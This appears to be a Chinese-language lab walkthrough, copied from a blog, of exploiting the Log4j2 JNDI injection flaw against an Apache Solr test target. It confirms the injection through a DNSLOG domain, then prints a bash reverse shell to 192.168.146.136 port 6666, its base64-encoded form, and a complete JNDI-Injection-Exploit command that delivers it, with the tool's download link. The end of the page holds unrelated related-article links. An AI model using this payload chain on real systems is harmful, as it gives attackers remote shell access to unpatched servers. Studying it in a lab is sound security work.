代码执行漏洞-Log4j2漏洞

启动靶场环境

⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果..

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

bash -i >& /dev/tcp/192.168.146.136/6666 0>&1

反弹Shell-base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx

最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.146.136"

服务器监听

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.

相关推荐
zfj3212 天前
java日志框架:slf4j、jul(java.util.logging)、 log4j、 logback
java·log4j·logback·java日志框架·slf4j·jul
星蓝_starblue2 天前
单元测试(C++)——gmock通用测试模版(个人总结)
c++·单元测试·log4j
从零开始的-CodeNinja之路4 天前
【自动化】深度解析仓库存储UI自动化
ui·自动化·log4j
luo_guibin11 天前
vulhub复现CVE-2021-44228log4j漏洞
java·log4j·cve-2021-44228
ahauedu13 天前
SpringBoot中读取mock数据-高效调试接口
spring boot·后端·log4j
黄金右肾14 天前
Qt之第三方库‌日志log使用(四)
c++·qt·ui·log4j·qslog
oscar99920 天前
三步入门Log4J 的使用
单元测试·log4j
st_3320 天前
Junit5 单元测试入门
数据库·单元测试·log4j
java使徒23 天前
kafka消息在client是怎么写入的
java·jvm·spring boot·spring cloud·kafka·tomcat·log4j
武昌库里写JAVA1 个月前
SpringCloud+SpringCloudAlibaba学习笔记
java·开发语言·算法·spring·log4j